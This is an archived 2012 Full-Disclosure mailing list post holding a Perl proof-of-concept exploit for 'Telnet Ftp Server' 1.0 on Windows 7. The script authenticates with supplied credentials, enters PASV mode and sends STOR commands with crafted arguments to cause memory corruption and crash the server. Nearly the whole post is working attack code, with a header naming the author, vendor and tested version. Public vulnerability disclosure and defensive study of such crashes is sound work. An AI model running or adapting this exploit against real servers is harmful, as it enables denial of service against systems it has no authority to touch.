lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CADe7mMfR=Kc+VWv-s2rL8uvi77iRdGn3J04kMiaFPeE_hd7fgg@mail.gmail.com>
Date: Sat, 14 Jul 2012 06:06:02 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Telnet Ftp Server <= Memory Corruption PoC

# Exploit Title: Telnet Ftp Server <= Memory Corruption PoC
# crash:http://img40.imageshack.us/img40/595/ftpqm.jpg
# Date: July 7, 2012
# Author: coolkaveh
# coolkaveh@...ketmail.com
# https://twitter.com/coolkaveh
# Vendor Homepage: http://www.slimbyte.sufx.net/
# also download link available at : http://telnet-ftp-server.en.softonic.com/
# Version: 1.0  build(1.218)
# Tested on: windows 7 SP1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Crappy Telnet Ftp Server Memory Corruption PoC
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#!/usr/bin/perl -w
use IO::Socket;
use Thread;
$|=1;
$host=shift;
$port=shift || "21";
if(!defined($host)){
	print("usage: $0 \$host [\$port]\n");
	exit(0);
}
$check_first=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
if(defined $check_first){
	print "$host -> $port is alive.\n";
	$check_first->close;
}else{
	die("$host -> $port is closed!\n");
}
@bf1=(
'A'x5,
);
@bf2=(
'!)!)',
);
@bf3=(
'0',
);
@t=@bf1;
push(@t, @bf2);
push(@t, @bf3);
sub check(){
	#Thread->self->detach;
	$sock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>$port,Timeout=>60);
	if(defined $sock){
		#print "$host -> $port is alive.\n";
		undef($content_tmp);
		$sock->recv($content_tmp,100,0);
		if(length($content_tmp)>0){
			$sock->close;
			return 1;
		}else{
			$sock->close;
			return 0;
		}
	}else{
		#print("$host -> $port is closed!\n");
		return 0;
	}
}
#set PASV Mode send Socket
sub send_sock($){
	$send_port_num=shift;
	Thread->self->detach;
	$send_sock_tmp=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$send_port_num, Proto=>'tcp', Timeout=>30);
	if(defined($send_sock_tmp)){
		$send_sock_tmp->recv($mem,100,0);
		print "$mem\n";
		$mem=0;
		$send_sock_tmp->close;
		undef($send_port_num);
		return 1;
	}else{
		undef($send_port_num);
		return 0;
	}
}
print "Please enter the real username: ";
$real_username=<STDIN>;
chop($real_username);
print "Please enter the real password: ";
$real_password=<STDIN>;
chop($real_password);
@cm=(
'STOR',
'STOR',
);
$sock3=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port,
Proto=>'tcp', Timeout=>30);
if(defined($sock3)){
	$sock3->recv($content, 100, 0);
	print "$content\n";
	sleep(2);
	$sock3->send("USER "."$real_username\r\n", 0);
	sleep(2);
	$sock3->recv($content, 100, 0);
	print "$content\n";
	sleep(2);
	$sock3->send("PASS "."$real_password\r\n", 0);
	sleep(2);
	$sock3->recv($content, 100, 0);
	print "$content\n";
	sleep(2);
	if($content=~m/^230/){
		$sock3->close;
	}else{
		$sock3->close;
		die("Username or Password is wrong!\n");
	}
}else{
	die "$host -> $port is closed!\n";
}
L_V_J: undef($cmd);
C_L: foreach $cmd (@cm){
	foreach $poc (@t){
		LABEL5: $sock4=IO::Socket::INET->new(PeerAddr=>$host,
PeerPort=>$port, Proto=>'tcp', Timeout=>30);
		if(defined($sock4)){
			$sock4->recv($content, 100, 0);
			print "$content\n";
			sleep(2);
			$sock4->send("USER "."$real_username\r\n", 0);
			sleep(2);
			$sock4->recv($content, 100, 0);
			print "$content\n";
			sleep(2);
			$sock4->send("PASS "."$real_password\r\n", 0);
			sleep(2);
			$sock4->recv($content, 100, 0);
			print "$content\n";
			sleep(2);
			if(($cmd eq 'STOR')){
				$sock4->send("PASV\r\n", 0);
				sleep(2);
				$sock4->recv($content, 100, 0);
				print "$content\n";
				sleep(2);
				if($content=~m/\((.*),(.*),(.*),(.*),(.*),(.*)\)/){
					$send_port=$5*256+$6;
				}
				}
			}
			$sock4->send("$cmd"." "."$poc\r\n", 0);
		Thread->new(\&send_sock,$send_port);
			$sock4->send("$cmd"." "."$poc\r\n", 0);
			sleep(2);
			$sock4->recv($content, 100, 0);
			$thread3=Thread->new(\&check);
			undef($thread3);
			$sock4->send("QUIT\r\n", 0);
			}
				}

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ